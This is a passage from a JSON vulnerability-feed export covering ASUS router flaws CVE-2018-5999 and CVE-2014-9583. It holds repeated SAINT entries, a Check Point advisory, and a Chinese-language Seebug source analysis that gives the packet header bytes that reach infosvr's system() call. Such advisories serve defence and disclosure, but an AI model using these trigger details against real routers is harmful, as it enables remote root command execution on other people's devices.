./rsf.py\n\nThe post [UPDATED VERSION: RouterSploit 3.4.0](<http://pentestit.com/updated-version-routersploit-3-4-0/>) appeared first on [PenTestIT](<http://pentestit.com>).", "cvss3": {}, "published": "2018-10-18T18:13:04", "type": "pentestit", "title": "UPDATED VERSION: RouterSploit 3.4.0", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2016-6433", "CVE-2017-3881", "CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-10-18T18:13:04", "id": "PENTESTIT:30AF1FB3AAE47288E800B5587788AF45", "href": "http://pentestit.com/updated-version-routersploit-3-4-0/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2023-07-13T15:27:58", "description": "Added: 02/28/2018 \nCVE: [CVE-2018-5999](<https://vulners.com/cve/CVE-2018-5999>) \n\n\n### Background\n\n[ASUSWRT](<https://www.asus.com/ASUSWRT/>) is the firmware used in many ASUS devices. \n\n### Problem\n\nThe combination of two separate vulnerabilities in ASUSWRT allows remote attackers to execute arbitrary commands. The first vulnerability allows an unauthenticated user to make certain POST requests. The second allows NVRAM settings to be changed using a POST request to `**vpnupload.cgi**`. \n\n### Resolution\n\nUpgrade to ASUSWRT version 3.0.0.4.384_10007 or higher. \n\n### References\n\n<http://seclists.org/fulldisclosure/2018/Jan/78> \n\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-28T00:00:00", "type": "saint", "title": "ASUSWRT vpnupload.cgi authentication bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5999"], "modified": "2018-02-28T00:00:00", "id": "SAINT:9EC44034675C3CB4D052F0A57AE94026", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/asuswrt_vpnupload_auth_bypass", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:22", "description": "Added: 02/28/2018 \nCVE: [CVE-2018-5999](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5999>) \n\n\n### Background\n\n[ASUSWRT](<https://www.asus.com/ASUSWRT/>) is the firmware used in many ASUS devices. \n\n### Problem\n\nThe combination of two separate vulnerabilities in ASUSWRT allows remote attackers to execute arbitrary commands. The first vulnerability allows an unauthenticated user to make certain POST requests. The second allows NVRAM settings to be changed using a POST request to `**vpnupload.cgi**`. \n\n### Resolution\n\nUpgrade to ASUSWRT version 3.0.0.4.384_10007 or higher. \n\n### References\n\n<http://seclists.org/fulldisclosure/2018/Jan/78> \n\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-28T00:00:00", "type": "saint", "title": "ASUSWRT vpnupload.cgi authentication bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5999"], "modified": "2018-02-28T00:00:00", "id": "SAINT:1FAFFE9723ECA2EE5DFB56A36466F828", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/asuswrt_vpnupload_auth_bypass", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T15:16:57", "description": "Added: 02/28/2018 \nCVE: [CVE-2018-5999](<https://vulners.com/cve/CVE-2018-5999>) \n\n\n### Background\n\n[ASUSWRT](<https://www.asus.com/ASUSWRT/>) is the firmware used in many ASUS devices. \n\n### Problem\n\nThe combination of two separate vulnerabilities in ASUSWRT allows remote attackers to execute arbitrary commands. The first vulnerability allows an unauthenticated user to make certain POST requests. The second allows NVRAM settings to be changed using a POST request to `**vpnupload.cgi**`. \n\n### Resolution\n\nUpgrade to ASUSWRT version 3.0.0.4.384_10007 or higher. \n\n### References\n\n<http://seclists.org/fulldisclosure/2018/Jan/78> \n\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-28T00:00:00", "type": "saint", "title": "ASUSWRT vpnupload.cgi authentication bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5999"], "modified": "2018-02-28T00:00:00", "id": "SAINT:5069DD588A8DDA678A16F6B17DE4B1F1", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/asuswrt_vpnupload_auth_bypass", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T08:49:41", "description": "Added: 01/13/2015 \nCVE: [CVE-2014-9583](<https://vulners.com/cve/CVE-2014-9583>) \nBID: [71889](<http://www.securityfocus.com/bid/71889>) \nOSVDB: [116691](<http://www.osvdb.org/116691>) \n\n\n### Background\n\nASUS manufactures network devices, including routers and wireless repeaters. Some of these devices include the infosvr service, part of the \"ASUS Wireless Router Device Discovery Utility\". The infosvr service listens on port 9999/UDP. \n\n### Problem\n\nThe file `**common.c**` in infosvr used in ASUS RT-AC66U and other routers does not properly verify the source MAC address of incoming requests, thereby allowing an attacker on the local network to execute arbitrary commands less than 238 bytes sent to 9999/UDP as root. \n\n### Resolution\n\nUpdate the firmware to revision 3.0.0.4.376.3754 or newer. Manually check the firmware version because the router's \"Check for Update\" functionality may not work properly. \n\n### References\n\n<http://www.pcworld.com/article/2867252/exploit-allows-asus-routers-to-be-hacked-from-local-network.html> \n<http://www.zdnet.com/article/asus-routers-vulnerable-to-network-attack-exploit-published/> \n<https://github.com/jduck/asus-cmd> \n\n\n### Limitations\n\nThe exploit attempt must be launched from the same local network as the target. \n\nExploit was tested on ASUS RTN66U with firmware version 3.0.0.4.376_1071. \n\n", "cvss3": {}, "published": "2015-01-13T00:00:00", "type": "saint", "title": "ASUS Router infosvr Service Remote Command Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9583"], "modified": "2015-01-13T00:00:00", "id": "SAINT:75674DE142EE6A5182F2C3AEAC3FE313", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/asus_rtn66u_infosvr", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-27T05:20:09", "description": "Added: 01/13/2015 \nCVE: [CVE-2014-9583](<https://vulners.com/cve/CVE-2014-9583>) \nBID: [71889](<http://www.securityfocus.com/bid/71889>) \nOSVDB: [116691](<http://www.osvdb.org/116691>) \n\n\n### Background\n\nASUS manufactures network devices, including routers and wireless repeaters. Some of these devices include the infosvr service, part of the \"ASUS Wireless Router Device Discovery Utility\". The infosvr service listens on port 9999/UDP. \n\n### Problem\n\nThe file `**common.c**` in infosvr used in ASUS RT-AC66U and other routers does not properly verify the source MAC address of incoming requests, thereby allowing an attacker on the local network to execute arbitrary commands less than 238 bytes sent to 9999/UDP as root. \n\n### Resolution\n\nUpdate the firmware to revision 3.0.0.4.376.3754 or newer. Manually check the firmware version because the router's \"Check for Update\" functionality may not work properly. \n\n### References\n\n<http://www.pcworld.com/article/2867252/exploit-allows-asus-routers-to-be-hacked-from-local-network.html> \n<http://www.zdnet.com/article/asus-routers-vulnerable-to-network-attack-exploit-published/> \n<https://github.com/jduck/asus-cmd> \n\n\n### Limitations\n\nThe exploit attempt must be launched from the same local network as the target. \n\nExploit was tested on ASUS RTN66U with firmware version 3.0.0.4.376_1071. \n\n", "cvss3": {}, "published": "2015-01-13T00:00:00", "type": "saint", "title": "ASUS Router infosvr Service Remote Command Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9583"], "modified": "2015-01-13T00:00:00", "id": "SAINT:46C18EA8DC44A814054B124849F1C9B9", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/asus_rtn66u_infosvr", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:19", "description": "Added: 01/13/2015 \nCVE: [CVE-2014-9583](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9583>) \nBID: [71889](<http://www.securityfocus.com/bid/71889>) \nOSVDB: [116691](<http://www.osvdb.org/116691>) \n\n\n### Background\n\nASUS manufactures network devices, including routers and wireless repeaters. Some of these devices include the infosvr service, part of the \"ASUS Wireless Router Device Discovery Utility\". The infosvr service listens on port 9999/UDP. \n\n### Problem\n\nThe file `**common.c**` in infosvr used in ASUS RT-AC66U and other routers does not properly verify the source MAC address of incoming requests, thereby allowing an attacker on the local network to execute arbitrary commands less than 238 bytes sent to 9999/UDP as root. \n\n### Resolution\n\nUpdate the firmware to revision 3.0.0.4.376.3754 or newer. Manually check the firmware version because the router's \"Check for Update\" functionality may not work properly. \n\n### References\n\n<http://www.pcworld.com/article/2867252/exploit-allows-asus-routers-to-be-hacked-from-local-network.html> \n<http://www.zdnet.com/article/asus-routers-vulnerable-to-network-attack-exploit-published/> \n<https://github.com/jduck/asus-cmd> \n\n\n### Limitations\n\nThe exploit attempt must be launched from the same local network as the target. \n\nExploit was tested on ASUS RTN66U with firmware version 3.0.0.4.376_1071. \n\n", "cvss3": {}, "published": "2015-01-13T00:00:00", "type": "saint", "title": "ASUS Router infosvr Service Remote Command Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9583"], "modified": "2015-01-13T00:00:00", "id": "SAINT:79379382D62E420B234A449DAE36D8AE", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/asus_rtn66u_infosvr", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:57", "description": "Added: 01/13/2015 \nCVE: [CVE-2014-9583](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9583>) \nBID: [71889](<http://www.securityfocus.com/bid/71889>) \nOSVDB: [116691](<http://www.osvdb.org/116691>) \n\n\n### Background\n\nASUS manufactures network devices, including routers and wireless repeaters. Some of these devices include the infosvr service, part of the \"ASUS Wireless Router Device Discovery Utility\". The infosvr service listens on port 9999/UDP. \n\n### Problem\n\nThe file `**common.c**` in infosvr used in ASUS RT-AC66U and other routers does not properly verify the source MAC address of incoming requests, thereby allowing an attacker on the local network to execute arbitrary commands less than 238 bytes sent to 9999/UDP as root. \n\n### Resolution\n\nUpdate the firmware to revision 3.0.0.4.376.3754 or newer. Manually check the firmware version because the router's \"Check for Update\" functionality may not work properly. \n\n### References\n\n<http://www.pcworld.com/article/2867252/exploit-allows-asus-routers-to-be-hacked-from-local-network.html> \n<http://www.zdnet.com/article/asus-routers-vulnerable-to-network-attack-exploit-published/> \n<https://github.com/jduck/asus-cmd> \n\n\n### Limitations\n\nThe exploit attempt must be launched from the same local network as the target. \n\nExploit was tested on ASUS RTN66U with firmware version 3.0.0.4.376_1071. \n\n", "cvss3": {}, "published": "2015-01-13T00:00:00", "type": "saint", "title": "ASUS Router infosvr Service Remote Command Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-9583"], "modified": "2015-01-13T00:00:00", "id": "SAINT:4A5BD29FAF80B56E6590F3C648A7268F", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/asus_rtn66u_infosvr", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:38:45", "description": "A remote command execution vulnerability exists in Asuswrt. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {}, "published": "2016-10-26T00:00:00", "type": "checkpoint_advisories", "title": "ASUSWRT LAN Backdoor Remote Command Execution (CVE-2014-9583)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9583"], "modified": "2017-09-19T00:00:00", "id": "CPAI-2016-0934", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:32:47", "description": "\u6f0f\u6d1e\u6982\u89812014\u5e7410\u67083\u65e5\uff0c\u56fd\u5916\u5b89\u5168\u7814\u7a76\u5458Joshua J. Drake\u5728\u4ed6github\uff08<a href=\"https://github.com/jduck\">https://github.com/jduck</a>\uff09\u63d0\u4ea4\u4e86\u9488\u5bf9\u534e\u7855\u8def\u7531\u5668\u7684\u4e00\u4e2a\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1epoc\uff08<a href=\"https://github.com/jduck/asus-cmd\">https://github.com/jduck/asus-cmd</a>\uff09\u3002\u8be5\u6f0f\u6d1e\u968f\u540e\u88ab\u7f16\u53f7\u4e3aCVE-2014-9583\u3002\u77e5\u9053\u521b\u5b87\u5b89\u5168\u7814\u7a76\u56e2\u961f\u5728\u7b2c\u4e00\u65f6\u95f4\u5bf9\u8be5\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u8fdb\u884c\u4e86\u7814\u7a76\u548c\u5206\u6790\u3002<h4>a)     \u6f0f\u6d1e\u63cf\u8ff0</h4>\u534e\u7855\u8def\u7531\u5668R\u7cfb\u5217\u8def\u7531\u5668\u4f7f\u7528\u5f00\u6e90\u8def\u7531\u5668\u7cfb\u7edf <a href=\"https://github.com/RMerl/asuswrt-merlin\" target=\"_blank\">Asuswrt</a>\uff0c\u5f00\u6e90\u4ee3\u7801\u7ed9\u6211\u4eec\u968f\u540e\u7684\u6f0f\u6d1e\u5206\u6790\u5e26\u6765\u5f88\u591a\u65b9\u4fbf\uff0c\u4e0d\u7528\u9006\u5411\u5206\u6790\u3002\u5728Asuswrt\u4e2d\u5b58\u5728 <a href=\"https://github.com/RMerl/asuswrt-merlin/tree/master/release/src/router/infosvr\" target=\"_blank\">infosvr</a> \u8fdb\u7a0b\uff0c\u8be5\u8fdb\u7a0b\u76d1\u542c\u57280.0.0.0 IP\u4e0a\uff0c\u76d1\u542c\u672c\u673a\u4efb\u4f55IP\u76849999 UDP\u7aef\u53e3\u3002Infosvr\u81ea\u8eab\u7684\u6388\u6743\u673a\u5236\u4e0d\u5b8c\u6574\uff0c\u5728infosvr\u5904\u7406\u7528\u6237\u63d0\u4ea4\u7684\u6570\u636e\u65f6\u4e5f\u6ca1\u6709\u9002\u5408\u7684\u8fc7\u6ee4\uff0c\u800c\u4e14\u4f7f\u7528\u4e86system()\u51fd\u6570\u6267\u884c\u90e8\u5206\u8bf7\u6c42\uff0c\u6700\u7ec8\u5bfc\u81f4\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u3002<h4>b)     \u6f0f\u6d1e\u5f71\u54cd</h4>\u636eJoshua J. Drake\u5728github\u4e0a\u7684\u5206\u6790\uff0c\u53d7\u5f71\u54cd\u7684\u7248\u672c\u5982\u4e0b\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/1.jpg\" alt=\"1\" width=\"492\" height=\"241\">\u4e0d\u8fc7\uff0c\u5f00\u6e90\u8def\u7531\u5668\u7cfb\u7edfAsuswrt\u9879\u76ee\u652f\u6301\u5982\u4e0b\u6240\u6709\u8def\u7531\u5668\u786c\u4ef6\u578b\u53f7\uff0c\u6240\u4ee5\u5efa\u8bae\u5982\u4e0b\u578b\u53f7\u8def\u7531\u5668\u7528\u6237\u68c0\u6d4b\u662f\u5426\u5b58\u5728\u6f0f\u6d1e\uff1a<ul><li>RT-N16</li><li>RT-AC56U</li><li>RT-N66U</li><li>RT-AC66U</li><li>RT-AC68U</li><li>RT-AC68P</li><li>RT-AC87U</li></ul><h4> c)     \u6f0f\u6d1e\u5206\u6790</h4>\u4ee3\u7801\u6587\u4ef6\uff1a<a href=\"https://github.com/RMerl/asuswrt-merlin/blob/34b5933112d7164b68add63fee63f007a0569309/release/src/router/infosvr/infosvr.c\">https://github.com/RMerl/asuswrt-merlin/blob/34b5933112d7164b68add63fee63f007a0569309/release/src/router/infosvr/infosvr.c</a> \u5728\u4ee3\u7801162\u884c\u5904\uff0cinfosvr\u7ed1\u5b9a\u5230\u4e860.0.0.0 IP\u76849999 UDP\u7aef\u53e3\u4e0a\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image003.png\" alt=\"image003\" width=\"638\" height=\"179\"> \u5728\u4ee3\u7801186\u884c\u5904\uff0cinfosvr\u5bf9\u4f20\u5165\u7684\u8bf7\u6c42\u4ea4\u7ed9processReq()\u51fd\u6570\u5904\u7406\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image005.png\" alt=\"image005\" width=\"642\" height=\"243\">processReq()\u51fd\u6570\u7684\u529f\u80fd\u5c31\u662f\u63a5\u6536512\u5b57\u8282\u7684\u8bf7\u6c42\u6570\u636e\uff0c\u5e76\u5728\u4ee3\u7801227\u884c\u5904\u628a\u6570\u636e\u4ea4\u7ed9processPacket()\u51fd\u6570\u5904\u7406\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image007.png\" alt=\"image007\" width=\"643\" height=\"454\"> processPacket()\u51fd\u6570\u4f4d\u4e8e\u6587\u4ef6\uff1a<a href=\"https://github.com/RMerl/asuswrt-merlin/blob/34b5933112d7164b68add63fee63f007a0569309/release/src/router/infosvr/common.c\">https://github.com/RMerl/asuswrt-merlin/blob/34b5933112d7164b68add63fee63f007a0569309/release/src/router/infosvr/common.c</a> processPacket()\u51fd\u6570\u5728\u4ee3\u7801202\u884c\u5904\u628a512\u5b57\u8282\u7684\u8bf7\u6c42\u6570\u636e(pdubuf\u5b57\u7b26\u6307\u9488)\u8f6c\u6362\u6210IBOX_COMM_PKT_HDR\u7ed3\u6784\uff08phdr\uff09\uff0c\u653b\u51fb\u8005\u5982\u679c\u60f3\u89e6\u53d1\u6f0f\u6d1e\uff0c\u9700\u8981\u6309\u7167\u8fd9\u4e2a\u6570\u636e\u7ed3\u6784\u6765\u53d1\u9001\u6570\u636e\u5305\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image009.png\" alt=\"image009\" width=\"647\" height=\"343\">IBOX_COMM_PKT_HDR\u7ed3\u6784\u5728\u6587\u4ef6\uff1a<a href=\"https://github.com/RMerl/asuswrt-merlin/blob/34b5933112d7164b68add63fee63f007a0569309/release/src/router/infosvr/iboxcom.h.wirelesshd\">https://github.com/RMerl/asuswrt-merlin/blob/34b5933112d7164b68add63fee63f007a0569309/release/src/router/infosvr/iboxcom.h.wirelesshd</a> IBOX_COMM_PKT_HDR\u7ed3\u6784\u5728\u4ee3\u780181\u884c\u5904\u5b9a\u4e49\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image011.png\" alt=\"image011\" width=\"641\" height=\"110\">\u60f3\u8981\u8fdb\u5165\u89e6\u53d1\u6f0f\u6d1e\u7684\u5173\u952e\u4ee3\u7801\u533a\u57df\uff0c\u9700\u8981\u901a\u8fc7common.c\u6587\u4ef6\u4ee3\u7801207\u884c\u5904\u7684if\u5224\u65ad\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image013.png\" alt=\"image013\" width=\"645\" height=\"104\">\u6240\u4ee5\uff0c\u6211\u4eec\u8981\u8bbe\u5b9a\u653b\u51fb\u4ee3\u7801\u7684\u524d\u4e24\u5b57\u8282\u5206\u522b\u4e3a\u5e38\u91cfNET_SERVICE_ID_IBOX_INFO\u548cNET_PACKET_TYPE_CMD\u7684\u503c\uff0c\u5373\uff1a\\x0C\\x15\uff08\u5341\u8fdb\u5236\u662f12\u548c21\uff09\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image015.png\" alt=\"image015\" width=\"645\" height=\"140\">\u6765\u5230common.c\u6587\u4ef6\u4ee3\u7801222\u884c\u5904\uff0cinfosvr\u4f5c\u8005\u5e94\u8be5\u662f\u60f3\u5bf9\u968f\u540e\u80fd\u6267\u884csystem()\u51fd\u6570\u4ee3\u7801\u7684\u6570\u636e\u505a\u4e2a\u6388\u6743\uff0c\u6216\u8005\u9a8c\u8bc1\u3002\u8be5\u5904\u4f5c\u8005\u4f7f\u7528\u4e86MAC\u9a8c\u8bc1\uff08\u4ee3\u7801227\u884c\u5904\uff09\u548c\u5bc6\u7801\u9a8c\u8bc1\uff0c\u4e0d\u8fc7\u4e0d\u77e5\u4e3a\u4f55\u5bc6\u7801\u9a8c\u8bc1\u4ee3\u7801\u88ab\u6ce8\u91ca\u6389\u4e86\uff08\u4ee3\u7801240\u884c\u5904\uff09\uff0c\u800c\u9488\u5bf9MAC\u9a8c\u8bc1\u7684\u4ee3\u7801\u4e5f\u5c5e\u4e8e\u6446\u8bbe\u72b6\u6001\uff0c\u4ee3\u7801\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image017.png\" alt=\"image017\" width=\"644\" height=\"355\">\u5728\u9a8c\u8bc1\u524d\uff0c\u9700\u8981\u628a512\u5b57\u8282\u6570\u636epdubuf\u8f6c\u6362\u6210IBOX_COMM_PKT_HDR_EX\u6570\u636e\u7ed3\u6784\uff0cIBOX_COMM_PKT_HDR_EX\u7ed3\u6784\u5305\u542b\u4e86MAC\u5b57\u6bb5\u548c\u5bc6\u7801\u5b57\u6bb5\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image019.png\" alt=\"image019\" width=\"644\" height=\"117\">\u4e3a\u4ec0\u4e48\u8bf4MAC\u9a8c\u8bc1\u662f\u6446\u8bbe\u5462\uff1f\u56e0\u4e3a\u5728common.c\u6587\u4ef6\u4ee3\u7801227\u884c\u5904\uff0c\u4ee3\u7801\u53ea\u662f\u628aMacAddress\u7684\u524d6\u5b57\u8282\u62f7\u8d1d\u5230\u4e86\u5b57\u7b26\u6570\u7ec4mac\u5904\uff0c\u8fd4\u56de\u662f\u6307\u5411mac\u5730\u5740\u7684\u6307\u9488\uff0c\u4e0d\u4f1a\u7b49\u4e8e0\uff0c\u6240\u4ee5\u8be5\u9a8c\u8bc1\u6beb\u65e0\u4efb\u4f55\u7528\u5904\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image021.png\" alt=\"image021\" width=\"642\" height=\"155\">\u5927\u80c6\u731c\u6d4b\u4f5c\u8005\u53ef\u80fd\u662f\u60f3\u7528memcmp()\u51fd\u6570\uff0c\u7ed3\u679c\u7528\u9519\u4e86\uff0c\u4e0d\u5f97\u800c\u77e5\u3002\u7ee7\u7eed\u524d\u8fdb\uff0c\u5728common.c\u6587\u4ef6\u4ee3\u7801251\u884c\u5904\u8fdb\u5165switch()\u51fd\u6570\u5224\u65ad\u9636\u6bb5\uff0c\u9488\u5bf9\u4e0d\u540cOpCode\u6267\u884c\u4e0d\u540c\u7684\u5206\u652f\u4ee3\u7801\uff0c\u800c\u5f53OpCode\u4e3aNET_CMD_ID_MANU_CMD\u5e38\u91cf\u503c\uff08\u5341\u8fdb\u523651\uff0c\u5341\u516d\u8fdb\u523633\uff09\u65f6\uff0c\u624d\u80fd\u6267\u884csystem()\u51fd\u6570\u4ee3\u7801\uff0c\u6240\u4ee5\uff0c\u6211\u4eec\u8981\u8bbe\u5b9a\u653b\u51fb\u4ee3\u7801\u7684\u524d\u56db\u5b57\u8282\u4e3a\\x0C\\x15\\x33\\x00\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image023.png\" alt=\"image023\" width=\"643\" height=\"93\"><img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image025.png\" alt=\"image025\" width=\"643\" height=\"243\">\u5728common.c\u6587\u4ef6NET_CMD_ID_MANU_CMD\u5206\u503c\u4ee3\u7801\u4e2d\uff0c\u4ee3\u7801440\u884c\u51fa\u4ee3\u7801\u628apdubuf\u51cf\u53bbIBOX_COMM_PKT_HDR_EX\u7ed3\u6784\u7684\u6570\u636e\uff0c\u5269\u4f59\u90e8\u5206\u8f6c\u6362\u6210PKT_SYSCMD\u7ed3\u6784\uff0c\u4f5c\u4e3a\u547d\u4ee4\u6267\u884c\u6570\u636e\uff0cPKT_SYSCMD\u7ed3\u6784\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image027.png\" alt=\"image027\" width=\"644\" height=\"64\">\u6700\u7ec8\uff0c\u5728common.c\u6587\u4ef6\u4ee3\u7801514\u884c\u5904\uff0csyscmd\u7ed3\u6784\u4e2dcmd\u5b57\u6bb5\u88ab\u8d4b\u503c\u7ed9cmdstr\uff0c\u5728\u4ee3\u7801515\u884c\u5904\uff0ccmdstr\u4f5c\u4e3a\u547d\u4ee4\u88absystem()\u51fd\u6570\u6267\u884c\uff0c\u5982\u56fe\uff1a<img src=\"http://blog.knownsec.com/wp-content/uploads/2015/01/image029.png\" alt=\"image029\" width=\"643\" height=\"93\"><h4>d)     